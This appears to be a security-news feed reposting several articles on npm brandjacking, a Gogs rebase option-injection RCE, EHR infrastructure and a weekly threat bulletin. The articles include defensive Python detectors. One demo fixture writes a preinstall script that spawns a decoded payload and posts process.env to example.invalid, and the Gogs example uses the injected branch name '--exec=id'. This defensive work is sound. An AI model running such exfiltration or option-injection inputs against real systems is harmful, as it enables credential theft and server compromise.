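The common thread in the npm campaigns above is the install-time hook: a preinstall script that launches a credential harvester, or a postinstall script that downloads a second stage, detaches it, and ships process.env to a collector. An installed tree can be audited for exactly that. The Python below is an added example, not Microsoft's or any vendor's tooling: it walks node_modules, reports every lifecycle hook it finds, follows a hook that delegates to a shipped .js file, and tags the cheap indicators those campaigns share (remote fetch, process.env access, detached spawn, base64-decoded payloads), plus an implausibly high major version as a heuristic taken from the 99.99.99 confusion campaign. The node_modules tree it builds in a temp directory and the package names in it are constructed for the demo.

```python
"""Audit an installed node_modules tree for lifecycle hooks and what they run.

Added example; not Microsoft's or any vendor's tooling. The tree it builds in
a temp directory is constructed for the demo with made-up package names.
"""
import json
import os
import re
import tempfile

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Cheap indicators pulled from the campaigns above: a hook that reaches out,
# reads process.env, detaches a child, or decodes an embedded payload.
INDICATORS = {
    "remote fetch": re.compile(r"\bfetch\(|\bhttps?://|\bcurl\b|\bwget\b"),
    "inline eval": re.compile(r"\bnode\s+-e\b|\beval\("),
    "env access": re.compile(r"process\.env"),
    "detached spawn": re.compile(r"detached\s*:\s*true|\.unref\(\)"),
    "encoded payload": re.compile(r"base64|\batob\(|Buffer\.from\("),
}


def _read(path: str) -> str:
    try:
        with open(path, encoding="utf-8", errors="ignore") as f:
            return f.read()
    except OSError:
        return ""


def audit_lifecycle_scripts(node_modules: str) -> list:
    """One finding per lifecycle hook found in any package.json under node_modules."""
    findings = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            meta = json.loads(_read(os.path.join(root, "package.json")))
        except ValueError:
            continue
        scripts = meta.get("scripts") or {}
        version = str(meta.get("version", ""))
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            text = cmd
            local = re.search(r"\bnode\s+(\S+\.[cm]?js)\b", cmd)   # hook delegates to a shipped file?
            if local:
                text += "\n" + _read(os.path.join(root, local.group(1)))
            tags = [name for name, rx in INDICATORS.items() if rx.search(text)]
            major = re.match(r"\d+", version)
            if major and int(major.group()) >= 99:   # heuristic from the 99.99.99 confusion campaign
                tags.append("implausible version")
            findings.append({
                "package": meta.get("name", os.path.relpath(root, node_modules)),
                "version": version, "hook": hook, "command": cmd, "indicators": tags,
            })
    return findings


def build_sample_tree(base: str) -> str:
    """Constructed node_modules: one hooked package, one clean scoped package."""
    nm = os.path.join(base, "node_modules")
    bad = os.path.join(nm, "example-search-setup")
    os.makedirs(bad)
    with open(os.path.join(bad, "package.json"), "w") as f:
        json.dump({"name": "example-search-setup", "version": "99.99.99",
                   "scripts": {"preinstall": "node setup.js"}}, f)
    with open(os.path.join(bad, "setup.js"), "w") as f:
        f.write("const cp = require('child_process');\n"
                "const stage2 = Buffer.from('Li4u', 'base64').toString();\n"
                "cp.spawn(process.execPath, ['-e', stage2], {detached: true}).unref();\n"
                "fetch('https://example.invalid/report', {method: 'POST',"
                " body: JSON.stringify(process.env)});\n")
    good = os.path.join(nm, "@example", "clean-lib")
    os.makedirs(good)
    with open(os.path.join(good, "package.json"), "w") as f:
        json.dump({"name": "@example/clean-lib", "version": "1.2.3",
                   "scripts": {"test": "node test.js"}}, f)
    return nm


def demo() -> list:
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_lifecycle_scripts(build_sample_tree(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['package']}@{f['version']} {f['hook']}: {f['command']!r} -> {f['indicators']}")
```

The audit is only useful after the fact; the control that stops the harvester from running in the first place is installing with `npm ci --ignore-scripts` in CI and build images, then allowlisting the few packages that genuinely need a hook. npm's own `npm query ":attr(scripts, [preinstall])"` gives the same hook inventory without the indicator tagging.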

In a newly published report, Sonatype said threat actors have outgrown classic typosquatting, moving beyond obvious misspellings to names that look convincing inside legitimate developer workflows, the better to steal data and drop malicious payloads. That turns a routine install step into a pathway for reconnaissance, credential theft, and follow-on compromise.

Popular brandjacking techniques include prefix or suffix addition, dependency confusion, version mimicry, embedded target terms, altered scopes or namespaces, and names that resemble the function of a legitimate package.
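Most of those patterns are visible in the name alone, which makes them cheap to flag at the point where a dependency is added. The Python below is an added example, not Sonatype's tooling: given a candidate name, a set of trusted public names and a set of internal-only names, it reports suffix or prefix addition, an embedded target term, an altered or missing scope, a one-edit typo, and a public name that collides with an internal package (the dependency confusion case). KNOWN_PUBLIC and INTERNAL are made-up lists standing in for a real allowlist and a company's private registry names; the package names in the demo are taken from the list above and are not being re-published here.

```python
"""Name-shape checks for the brandjacking patterns Sonatype describes.

Added example; not Sonatype's tooling. KNOWN_PUBLIC and INTERNAL are made-up
lists standing in for a real allowlist and a company's private package names.
"""
import re

KNOWN_PUBLIC = {"opensearch", "@opensearch-project/opensearch", "elasticsearch",
                "dotenv", "config"}
INTERNAL = {"acme-build-tools"}        # names only published to a private registry


def split_scope(name: str):
    """'@scope/pkg' -> ('scope', 'pkg'); 'pkg' -> (None, 'pkg')."""
    if name.startswith("@") and "/" in name:
        scope, bare = name[1:].split("/", 1)
        return scope, bare
    return None, name


def tokens(bare: str) -> list:
    """Split a bare name on the separators package names use."""
    return [t for t in re.split(r"[-_.]", bare.lower()) if t]


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_name(candidate: str, known=KNOWN_PUBLIC, internal=INTERNAL) -> list:
    """Return the manufactured-legitimacy patterns a candidate name matches ([] if none)."""
    reasons = []
    _scope, c_bare = split_scope(candidate)
    c_toks = tokens(c_bare)

    if candidate in internal:
        reasons.append("dependency confusion: matches an internal package name")

    by_bare = {}                                  # bare name -> full names we trust
    for k in known:
        by_bare.setdefault(split_scope(k)[1], set()).add(k)

    if c_bare in by_bare and candidate not in by_bare[c_bare]:
        reasons.append("altered scope/namespace")   # same bare name, different or missing scope

    for k_bare in sorted(by_bare):
        if k_bare == c_bare:
            continue
        k_toks = tokens(k_bare)
        n = len(k_toks)
        windows = [c_toks[i:i + n] for i in range(len(c_toks) - n + 1)]
        if k_toks in windows:
            if c_toks[:n] == k_toks:
                reasons.append(f"suffix added to '{k_bare}'")
            elif c_toks[-n:] == k_toks:
                reasons.append(f"prefix added to '{k_bare}'")
            else:
                reasons.append(f"embeds target term '{k_bare}'")
        elif len(c_bare) >= 5 and levenshtein(c_bare.lower(), k_bare) == 1:
            reasons.append(f"one-edit typo of '{k_bare}'")
    return reasons


if __name__ == "__main__":
    for name in ("opensearch-setup", "vpmdhaj-opensearch-setup", "@evil/dotenv",
                 "env-config-manager", "elastisearch", "acme-build-tools", "dotenv"):
        print(f"{name:28} {classify_name(name)}")
```

A hit is a prompt for review, not a verdict: "opensearch-setup" is also a perfectly plausible name for a legitimate helper, which is the whole point of the technique. The check earns its keep as a gate on new dependencies, paired with the install-hook audit, rather than as a blocklist.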

"'Typosquatting' is now too narrow a label for what this analysis captures," the supply chain security company said. "The broader pattern is manufactured legitimacy: attackers designing package names to look plausible, useful, and operationally routine inside modern software ecosystems."

These incidents have unfolded against the backdrop of a series of software supply chain compromises linked to TeamPCP (aka Replicating Marauder and UNC6780), which has become a force to be reckoned with by poisoning popular developer tooling across npm, PyPI, Docker Hub, and Packagist in a worm-like fashion.

"Replicating Marauder was not just inserting malicious code into packages, but also exploiting automation, inherited trust, and ordinary CI/CD workflows to push compromise further downstream," BlueVoyant researcher Michael Warren said.

"This was the point where the campaign most clearly demonstrated that one poisoned dependency or container image could trigger compromise in an unrelated organization's release pipeline. The tactical shift turned isolated software poisoning into a reproducible method for victim-to-victim expansion."



from The Hacker News https://ift.tt/UuG2S4E
via IFTTT

Thursday, May 28, 2026

Your EHR is only as resilient as the infrastructure beneath it

There is a question I get from healthcare IT leaders more often than almost any other: how do we justify the cost of our infrastructure when no one in the boardroom understands what it does?

My answer is always the same: they understand it the moment something goes wrong.

That is the reality of healthcare IT. We operate in near invisibility when things work and under a microscope when they do not. And nothing makes things go wrong faster, at greater scale, and with more direct consequence to patients, than the wrong decision about how to deliver your EHR.

I have spent a long time thinking about what separates health systems that recover from major disruptions quickly from those that spend days, weeks or months, clawing back to normal operations. The answer is almost always architectural. Not a vendor decision, not a budget decision, not a staffing decision. An architectural one.

“Choosing the wrong delivery model can mean higher costs, more downtime in a crisis, and frustrated end-users; choosing the right model can improve uptime, contain cyber risks, and save millions of dollars over time.” – Envision IT, Epic Healthcare Delivery Models

The stakes have changed

Healthcare has always been a high-stakes environment for IT. But the threat landscape and the regulatory environment have converged in a way that makes EHR delivery architecture more consequential than it has ever been. Ransomware attacks are not a theoretical risk. Scripps Health lost four weeks of EHR access and $112.7 million in a single event. The wave of attacks targeting our sector is not slowing down.

At the same time, proposed HIPAA updates would require health systems to restore EHR access within 72 hours of a cyber incident. That is not a standard most thick-client environments can meet. I have watched organizations do the math after an event and realize—sometimes for the first time—what their architecture actually costs them when it fails.

That moment of recognition should happen before the incident, not after.

What the CrowdStrike event taught us

The 2024 CrowdStrike outage was painful for a lot of organizations, and it was clarifying for all of us. The recovery data tells a story that every CIO in healthcare should have in front of their leadership team.

“Three engineers recovered 18,000 thin client VDI desktops in four hours. At the same organization, a team of 150 IT staff needed nearly four days to recover 2,500 Windows PCs.” — Envision IT, Epic Healthcare Delivery Models

Read that again. Three people. Four hours. Eighteen thousand endpoints.

That is not a coincidence. That is architecture. When your EHR and clinical applications are delivered from a centralized platform through a single master VDI image, recovery simply means reverting that image. It means a reboot, not a rebuild. The contrast with decentralized, locally installed environments, where every affected device must be touched individually, should be a defining data point in every EHR delivery conversation your team is having right now.

This is a business decision, not a technical one

I want to be direct about something, because I think we do ourselves a disservice when we frame EHR delivery as an infrastructure question. It is not.

Every day your EHR is inaccessible, the patient safety clock starts. You lose revenue. Canceled procedures, delayed billing, ambulance diversion, and the cost of paper fallback workflows. These are not abstractions. The moment a clinician cannot reach Epic, the financial and care impacts start to compound, and your path back to normalcy gets farther away.

The architecture decision you make about EHR delivery shapes your organization’s ability to recover when things go wrong, your security posture, your total cost of ownership, and your ability to adapt as care models and regulations continue to evolve.

That is a strategic conversation. It belongs in the boardroom, not just the server room.

Independent research backs this up. Thin client VDI environments deliver 20 to 40 percent lower total cost of ownership than full PC deployments when you account for hardware, energy, and support costs over time. IT staffing ratios shift from roughly one admin per 60 endpoints to one per 500 to 1,000. And because no patient data lives on the device itself, a lost or stolen thin client is a nuisance, not a breach.

“Broad architectural decisions often have impacts that last for years. These choices can either limit or enable the system’s ability to quickly adapt to evolving market demands, regulatory requirements, or technological advancements.” — Envision IT, Epic Healthcare Delivery Models

What I tell other IT leaders

When a colleague asks me where to start, I tell them to stop framing EHR delivery as a technology problem and start framing it as a business continuity and risk management problem. Then take it to your CFO, your CMO, and your board with that framing, using a governance framework to align disaster preparedness activities and bring operations into active tabletop business resiliency exercises.

Show them the recovery data. Model the TCO difference. Walk them through what a 72-hour HIPAA restoration requirement means for your current architecture. The conversation changes when the numbers are on the table.

We have a responsibility to the patients and clinicians who depend on these systems every single day. That responsibility does not end at the edge of the server room. It extends to every endpoint, every workflow, and every decision we make about how those systems are delivered.

The architecture decision is the most important one you will make. Make it with intention.

For an independent, data-driven comparison of EHR delivery models across cost, risk, flexibility, and operational impact, read the Envision IT whitepaper: Epic Healthcare Delivery Models.



from Citrix Blogs https://ift.tt/gFmC3iH
via IFTTT

Critical Gogs RCE Vulnerability Lets Any Authenticated User Execute Arbitrary Code

A critical security vulnerability has been disclosed in Gogs, a popular open-source self-hosted Git service, that allows an authenticated user to execute arbitrary code under certain conditions.

The security flaw, per Rapid7, is rated 9.4 on the CVSS scoring system. It does not have a CVE identifier.

"The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the --exec flag into git rebase during the 'Rebase before merging' merge operation," security researcher Jonah Burgess said.

Rebasing is a Git action that's used to take a sequence of commits from one feature branch and replay them on top of another base branch to create a linear project history. While "git rebase" solves the same problem as "git merge" -- i.e., integrating changes from one branch into another -- the former rewrites the project history by creating new commits for each commit in the original branch.

The "git rebase" action also accepts, via an --exec flag, a shell command that is executed after each commit is replayed. A notable aspect of the vulnerability is that it requires neither admin privileges nor interaction with other users. On a default-configured instance, an attacker who does not yet have an account needs only to register one and create a repository.

"Any registered user who creates a repo is automatically its owner," Burgess said. "From there, enabling rebase merging is a single toggle in settings, and the entire exploit chain can be operated without interaction from any other user."

In an alternative scenario, a user with write access to a repository where rebase is already enabled can exploit the flaw directly to obtain code execution. On Gogs instances where repository creation is restricted, an attacker is required to have write access to any repository that has rebase merging enabled.
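The bug class here is option injection through an argument the attacker names: a branch called "--exec=..." handed to git as a bare positional is read by git's option parser as the --exec option, and the command it carries runs once per replayed commit. The Python below is an added example that illustrates the class, not Gogs' source code: it shows the unsafe argv construction next to a hardened one that validates the name and passes it fully qualified as refs/heads/<name>, which can never begin with a dash. How the hostile branch name reaches the server is outside the example; the page only says it arrives via a pull request.

```python
"""Option injection through a ref name: the pattern behind the Gogs rebase bug.

Added example; this is an illustration of the bug class, not Gogs' source. It
shows why a user-chosen branch name must never reach git as a bare positional
argument, and one way to build the argv so that it cannot.
"""
import re


class UnsafeRefName(ValueError):
    pass


def rebase_argv_vulnerable(upstream: str, branch: str) -> list:
    """UNSAFE: names are passed as bare positionals, so a branch literally called
    '--exec=id' is parsed by git as the --exec option, not as a ref."""
    return ["git", "rebase", upstream, branch]


def injected_options(argv: list) -> list:
    """Arguments after the subcommand that git's option parser would treat as options."""
    opts = []
    for a in argv[2:]:
        if a == "--":
            break              # everything after '--' is positional
        if a.startswith("-"):
            opts.append(a)
    return opts


_BAD_CHARS = re.compile(r"[\x00-\x20\x7f~^:?*\[\\]")


def validate_branch_name(name: str) -> str:
    """Reject names that could be read as options or are not valid ref components.
    Mirrors the parts of git's refname rules that matter here; a leading '-' is
    what turns a branch name into an option."""
    if not name or name.startswith("-"):
        raise UnsafeRefName(f"branch name may not be empty or start with '-': {name!r}")
    if _BAD_CHARS.search(name) or ".." in name or "@{" in name or "//" in name:
        raise UnsafeRefName(f"invalid characters in branch name: {name!r}")
    if name.startswith("/") or name.endswith(("/", ".", ".lock")):
        raise UnsafeRefName(f"invalid ref component boundary in: {name!r}")
    return name


def rebase_argv_hardened(upstream: str, branch: str) -> list:
    """Validate, then pass fully-qualified refs: 'refs/heads/<name>' can never start
    with '-', so even a name that slipped past validation cannot become an option."""
    return ["git", "rebase",
            "refs/heads/" + validate_branch_name(upstream),
            "refs/heads/" + validate_branch_name(branch)]


def is_rejected(name: str) -> bool:
    """True if the hardened path refuses the name."""
    try:
        validate_branch_name(name)
        return False
    except UnsafeRefName:
        return True


if __name__ == "__main__":
    hostile = "--exec=id"                     # the branch name is the attacker's input
    argv = rebase_argv_vulnerable("master", hostile)
    print("vulnerable argv:", argv, "-> git sees options:", injected_options(argv))
    print("hardened argv:", rebase_argv_hardened("master", "feature/pr-123"))
    print("hostile name rejected:", is_rejected(hostile))
```

The qualification step matters more than the validator: a denylist of characters can be wrong, but an argument that starts with "refs/heads/" is never an option. The same applies to every other place a server passes user-chosen refs, paths or messages to git as positionals. None of this replaces a fix in Gogs itself; until one ships, the app.ini changes listed below are the controls that matter.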

As of writing, the vulnerability remains unpatched despite having been reported to the maintainer on March 17, 2026. Successful exploitation of the bug could grant an attacker the ability to breach the server, access every repository on the instance, dump credentials, move to other network-accessible systems, and tamper with any hosted repository's code.

What's more, it can result in a cross-tenant data breach, allowing the attacker to read other users' private repositories hosted on the same shared server. According to Rapid7, the flaw impacts all supported platforms, such as Windows, Linux, and macOS.

There are an estimated 1,141 internet-facing Gogs instances. However, the actual figure is expected to be higher, given that most deployments are placed behind VPNs or internal networks.

In the absence of a patch, the following recommendations are outlined -

  • Restrict user registration (DISABLE_REGISTRATION = true in app.ini) to prevent untrusted users from creating accounts
  • Restrict repository creation (MAX_CREATION_LIMIT = 0 in app.ini) to prevent users from creating their own repositories
  • Audit rebase merge settings

Rapid7 has also released a Metasploit module that automates the full exploit chain against both Linux and Windows targets. The module supports two modes: by default, it creates a temporary repository under the attacker's account, runs the exploit, and deletes the repository; alternatively, it targets an existing repository to which the attacker already has write and merge access.

"When the attacker creates and deletes their own repository, the only trace is an HTTP 500 in the server logs," the cybersecurity expert said. "When exploiting an existing repository, additional artifacts remain."



from The Hacker News https://ift.tt/Hrzs9ZX
via IFTTT

Security Onion 3.1.0 Hotfix 20260528 Now Available!

Last week, we released Security Onion 3.1.0:

https://blog.securityonion.net/2026/05/security-onion-310-now-available-with.html


Today we are releasing a hotfix which resolves two known issues in that release:

https://docs.securityonion.net/en/3/main/release-notes/



from Security Onion https://ift.tt/wZtH0Vy
via IFTTT

ThreatsDay Bulletin: Claude Security Plugin, Azure Priv-Esc, Kali365 MFA Bypass, FIFA Scams +15 More

Every time you think the industry has finally stopped doing some reckless, low-effort crap, somebody spins up a fresh box full of sketchy loaders, fake installers, recycled social-engineering bait, and enough exposed infrastructure to make you wonder if prod is just a public beta now - meanwhile some researcher casually drops a technique that turns a "minor" foothold into total account compromise because apparently six digits and blind trust were all that stood between your vault and getting absolutely pwned. Cool. Great. Love that for us.

Then there's the supply chain mess... signed binaries, poisoned updates, legit tooling getting hijacked like it's still 2017, plus a few reports this week that feel less like advanced tradecraft and more like watching skiddies discover low-hanging fruit with enterprise branding slapped on top. The weird part isn't that it works. The weird part is how damn easy it still is.

Anyway. Grab caffeine. Let's get into it.

  1. Hunt.io said it identified more than 1,350 command-and-control (C2) servers across 98 Middle East infrastructure providers over the past three months, between February 1 and May 1, 2026. "C2 infrastructure dominates malicious activity (~96.8%), far exceeding phishing infrastructure (~0.5%) and publicly reported IOCs (~0.5%), while malicious open directories account for the remaining ~2.2% of observed artifacts," it said. "Saudi Arabia's STC (Saudi Telecom Company) hosts 981 C2 servers, representing 72.4% of all detected C2 infrastructure in the region. IoT-focused botnets (Hajime, Mozi, and Mirai) combined with offensive frameworks (Tactical RMM, Cobalt Strike, Sliver) represent the dominant malware families operating across Middle Eastern infrastructure."

  2. AKS privilege escalation flaw

    Microsoft is said to have silently fixed a privilege escalation flaw in Azure Backup for AKS that allowed a user with only the "Backup Contributor" Azure role (zero Kubernetes permissions) to gain cluster-admin on any AKS cluster, per security researcher Justin O'Leary. The vulnerability, which does not have a CVE, carries a CVSS score of 9.9. While Microsoft rejected the vulnerability report as "AI-generated content," it appears to have been patched since, and additional validation checks were enforced that did not exist in March 2026.

  3. Cybercrime operator jailed

    A 46-year-old Romanian national found guilty of breaking into an Oregon state government office in 2021 and other cyber attacks across the U.S. has been sentenced to 56 months in prison. Catalin Dragomir pleaded guilty to one count of aggravated identity theft and one count of obtaining information from a protected computer in February. Dragomir was arrested in Romania in November 2024 and extradited to the U.S. in January 2025 to face charges. Dragomir "sold access to a computer on the network of an Oregon state government office after obtaining unauthorized access to it in June of 2021," the Justice Department said. "During the sale, Dragomir provided the prospective buyer with samples of personal identifying information from the computer. He also sold access to the computer networks of numerous other victims in the United States, causing losses of at least $250,000."

  4. DAEMON Tools added to KEV

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the supply chain attack targeting DAEMON Tools software to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply necessary fixes by May 30, 2026. The incident is now being tracked under the identifier CVE-2026-8398 (CVSS v4 score: 9.3). "Attackers gained unauthorized access to the vendor's (AVB Disc Soft) build or distribution infrastructure and trojanized three binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe," according to the description of the CVE. "These files were digitally signed with the legitimate AVB Disc Soft code-signing certificate, allowing the malicious installers to appear trustworthy and bypass signature-based detection."

  5. Apple unveils PQC code

    Apple has published its post-quantum cryptography (PQC) implementations in corecrypto, including quantum-secure ML-KEM and ML-DSA algorithms, along with mathematical verification tools that it built to assure compliance with FIPS 203 and FIPS 204 specifications for independent evaluation by experts. "Corecrypto is used continuously in our products, providing encryption and decryption, hashing, random number generation, and digital signatures on over 2.5 billion active devices," Apple said. "A critical bug in corecrypto has the potential to compromise the security and reliability of every app and feature that depends on it, so we are conservative when adding new code to the library and make exceptional efforts to be comprehensive in our testing."

  6. Law firms targeted by SRG

    The U.S. Federal Bureau of Investigation (FBI) has warned that the threat actor known as the Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, has been targeting law firms using social engineering techniques as part of fresh attacks since spring 2026. Law firms are a rich target due to the highly sensitive nature of the data they possess. "Through phone calls and phishing emails, SRG actors pose as IT support to establish access to victim computers and exfiltrate data, usually through legitimate remote access tools or by sending an individual in-person to the victim company's location to gain physical access to computers," the FBI said. "While SRG has victimized companies in many sectors, including those in the insurance, finance, and healthcare industries, the group has consistently targeted U.S.-based law firms since Spring 2023." As part of the scheme involving in-person visits, the threat actor tells the victim they need to image the device or create a backup file to address potential impacts from the phishing email. Upon gaining a foothold, the attackers move swiftly to escalate privileges and pivot to data exfiltration without encryption. "By sending someone in-person to the victim's location to facilitate the intrusion, SRG actors exfiltrate data to an external hard drive or USB drive inserted by the threat actor into the victim's computer," the FBI added.

  7. Fake installers spread Deno RAT

    Attackers are hosting counterfeit installers and plugins masquerading as popular software, including ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, and Kontakt, on GitHub and SourceForge to distribute a Deno backdoor known as DinDoor (aka Tsundere). "Attackers are using compromised YouTube channels to distribute links to these platforms," Malwarebytes said. "DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime."

  8. PureLogs phishing wave

    A phishing campaign is using deceptive emails disguised as purchase orders to trick recipients into opening malicious JavaScript files contained within RAR archives that lead to the deployment of a PureLogs variant to steal sensitive data from the victim's device. "Upon analyzing the PureLogs module, the malware's primary capability is to collect sensitive data from the victim's system, including basic hardware and system information, saved credentials, cryptocurrency-related data, and more," Fortinet said. "The malware then compresses and encrypts the collected data before transmitting it to the C2 server."

  9. U.K. targets crypto sanctions evasion

    The U.K. has announced sanctions against cryptocurrency exchanges and the A7 network used by Russia to evade existing restrictions. Among those hit by sanctions is HTX (aka Huobi Global), which is one of the largest cryptoasset exchanges in the world, with $3.3 trillion in trading volume in 2025. "It is suspected of providing services to A7, the sanctioned Russian payments network, and Garantex, the sanctioned cryptocurrency exchange," Elliptic said. It's worth noting that the A7 corporate-and-token infrastructure emerged in the wake of the March 2025 Garantex takedown. Per data from TRM Labs, Huobi has sent more than $4.9 billion in direct on-chain transactions to U.K.-sanctioned and A7-network entities since 2021. Other entities hit by sanctions include Bitpapa and Rapira Group, the latter of which has transacted $375.6 million with Garantex's named successor Grinex.io.

  10. Claude gains built-in code review

    Anthropic has announced two new security features for its Claude AI: a self-hosted sandbox for Claude Managed Agents and a new security-guidance plugin. "The security guidance plugin makes Claude review its own code changes for common vulnerabilities while it works and fixes what it finds in the same session," Anthropic said. "The plugin catches issues such as injection, unsafe deserialization, and unsafe DOM APIs before the code reaches a pull request, reducing how much security review falls to human reviewers downstream. Once installed, the plugin runs automatically. There is nothing to invoke and no separate command to remember." As described by Red Hat, a self-hosted sandbox "outsources the 'thinking' while keeping the 'doing' on your own infrastructure."

  11. DACH cyberattacks jump 124%

    Data from Check Point has revealed that hacktivism and ransomware targeting organizations across Germany, Austria, and Switzerland increased 124% in 2025. More than 60% of the hacktivist incidents have involved defacing websites to amplify political messaging. These efforts originated from NoName057(16), Mr Hamza, chinafans, Dark Storm Team, and Hezi Rash. Ransomware attacks, on the other hand, were mainly led by Akira, Qilin, and Safepay. "Germany accounted for more than 80% of regional incidents, with Switzerland at 12% and Austria at 8%," Check Point said. "Across Europe, the DACH region represented 18% of all recorded attacks, placing Germany above France, Spain, and Italy by individual country share."

  12. World Cup scams explode online

    Threat actors are increasingly capitalizing on the public excitement around the FIFA World Cup 2026 for scam campaigns. Bitdefender said it has identified more than 55 football-related malvertising campaigns targeting users through fake online stores, social media ads, IPTV piracy operations, fraudulent football apps, and FIFA-themed giveaway and lottery scams distributed through email. "The most-targeted users were in the United Kingdom, Portugal, Spain, Algeria, the United States, Canada, Mexico, Belgium, Germany, Brazil, and Australia," the Romanian company said. Check Point said bad actors are "flooding the internet" with fake merchandise stores, fraudulent betting platforms, and phishing domains designed to steal personal data and money. Host nations of the sporting event, Canada, Mexico, and the U.S., have also recorded an increase in the weekly average number of cyber-attacks per organization in April 2026, with Mexico registering a weekly average of 3,548 cyber attacks per organization. Group-IB said it uncovered six distinct fraud schemes and over 4,300 fraudulent domains impersonating FIFA's official web presence. This includes a sophisticated phishing campaign conducted by a Chinese-speaking, financially motivated operator called GHOST STADIUM that involves using more than 300 domains using a shared phishing kit that exploits FIFA's PingIdentity SSO login flow to harvest credentials and conduct fake ticket sales and payment fraud at scale. "GHOST STADIUM has built a pixel-perfect clone of the official FIFA website, complete with a replicated single sign-on (SSO) authentication flow, and multi-language support in 11 languages," Group-IB said. "Facebook Ads serves as the primary paid traffic acquisition channel for the GHOST STADIUM campaign."

  13. Chrome extensions harvest WhatsApp data

    Cybersecurity researchers have uncovered a 126-extension Chrome Web Store extension network dubbed WaSteal that masquerades as independent WhatsApp CRM tools while exfiltrating user personal data, advertising cookies, and voice messages to operator-controlled servers, affecting nearly 148,000 users. According to researcher Jean-Marie R., the network is operated by wascript.com.br, which operates a white-label platform. "The largest variant (WaSeller, 100k installs) embeds a live GTM container giving its operator silent, permanent remote code execution with no extension update or Chrome review required," the researcher said. "The operator's own privacy policy directly contradicts every behavior documented."

  14. GhostTree breaks endpoint scanning

    A new technique named GhostTree abuses NTFS junctions to generate infinite file paths, causing endpoint security products to hang and leave files unscanned. "We discovered that by pointing a junction back at its own parent directory, an attacker can create recursive loops that generate effectively infinite file paths," Varonis said. "With just two lines of code, a user can generate endless valid paths, making it impossible to finish scanning parent directories with the dir command recursively. The same applies to EDR products that scan folders for malicious files. An attacker places malware in the parent directory, sets up the GhostTree structure, and the containing folder becomes effectively unscannable. The scan hangs. The malicious files go unexamined."

  15. Kali365 targets Microsoft 365

    An emerging Phishing-as-a-Service (PhaaS) platform called Kali365, first observed in April 2026, has been targeting Microsoft 365 environments. "Kali365 has primarily been distributed via Telegram, enabling cyber threat actors to obtain Microsoft 365 access tokens and bypass multi-factor authentication (MFA) protocols without intercepting the user's credentials," the FBI said. "Through the Kali365 platform subscription, cyber threat actors can capture 'OAuth' tokens and gain persistent access to targeted individuals/entities' Microsoft 365 environments." Like other PhaaS platforms, Kali365 risks lowering the barrier of entry to cybercrime, offering less-technical attackers access to artificial intelligence (AI)-generated phishing lures, automated campaign templates, real-time targeted individual/entity tracking dashboards, and OAuth token capture capabilities. Kali365 is available to affiliates on a subscription basis, ranging from $250 for 30 days to $2,000 for a year. In a report published last month, Arctic Wolf said it observed a device code phishing campaign using Kali365 to obtain initial access and conduct follow-on activity. "The campaign relied on high-fidelity lures directing victims to Microsoft's legitimate device login flow, where users unknowingly authorized threat actor-initiated sessions," the company said. "Captured OAuth access and refresh tokens enabled immediate mailbox access and post-compromise activity. In select cases, threat actors established malicious inbox rules to suppress security notifications, extending dwell time and reducing user awareness." Barracuda Networks and Proofpoint have also warned of a spike in device code phishing campaigns in recent months. Barracuda said it detected more than 7 million device code attacks between March and April 2026. "The surge of device code phishing is the natural progression of credential phishing, as more people become aware of multi-factor authentication bypass techniques, criminals must get creative," Proofpoint noted.

  16. Vaultjacking targets Google passwords

    PhishU has detailed a new technique called Vaultjacking, which demonstrates how a victim's 6-digit Google Password Manager (GPM) PIN captured via an adversary-in-the-middle (AitM) phishing page can be used to decrypt the entire synced GPM vault. "That single PIN releases Google's Security Domain Secret, which decrypts every synced password and passkey on the account -- not just the credential being registered, the entire vault," Curtis Brazzell, PhishU Flounder and CEO, said in a statement. Once the AitM page harvests the user's session cookies and GPM PIN, a threat actor can add a passkey to the victim's Google account for persistence and then unlock the victim's entire synced credential vault from their own infrastructure.

  17. Signed RVTools trojan spreads RAT

    A trojanized MSI installer for RVTools is being used to deploy a modular Python-based remote access trojan (RAT) using a VBScript loader. The malware includes a reconnaissance module that fingerprints the host and maps out Active Directory and a persistent command-and-control (C2) agent that encrypts stolen data and waits for operator commands. "What made this campaign particularly effective was the use of a legitimately issued Sectigo code-signing certificate, registered under what appears to be a shell entity - Xiamen Lunwei Huage Network Co.(Sectigo), Ltd," K7 Labs said. "At the time of delivery, the certificate was fully valid, meaning Windows SmartScreen and most endpoint controls raised no flags. It has since been revoked, though it offers limited protection to environments not enforcing real-time OCSP or CRL checks at execution time."

None of this was especially sophisticated. That's the lesson nobody wants to hear. Most breaches still start with trust abuse, stale configs, lazy access controls, or users getting socially engineered by someone sounding vaguely competent over the phone.

Patch faster. Audit harder. Stop assuming signed software, MFA prompts, or "internal-only" tooling means safe. The attackers already figured out the shortcuts. Might be time defenders stop pretending those shortcuts don't exist.



from The Hacker News https://ift.tt/PHGkB1R
via IFTTT

New AI Usage Report: Enterprise AI Risk Is Heavily Concentrated Among a Small Group of AI "Power users"

The State of AI Usage Report 2026 by LayerX Security reveals the extent of the enterprise AI visibility gap and why most organizations still don't understand where their AI exposure is actually coming from. The research shows that enterprise AI risk is not distributed evenly across users or platforms. Instead, it is heavily concentrated among a small group of AI power users and a handful of dominant AI platforms that drive the majority of enterprise AI activity and sensitive data exposure.

At the same time, AI usage is rapidly fragmenting across personal accounts, AI browser extensions, embedded copilots, AI connectors, and secondary AI tools operating outside traditional visibility and governance controls. The result is a fragmented AI ecosystem that most organizations still cannot fully see or govern.

While AI Is Everywhere in the Enterprise, Most Employees Are Casual

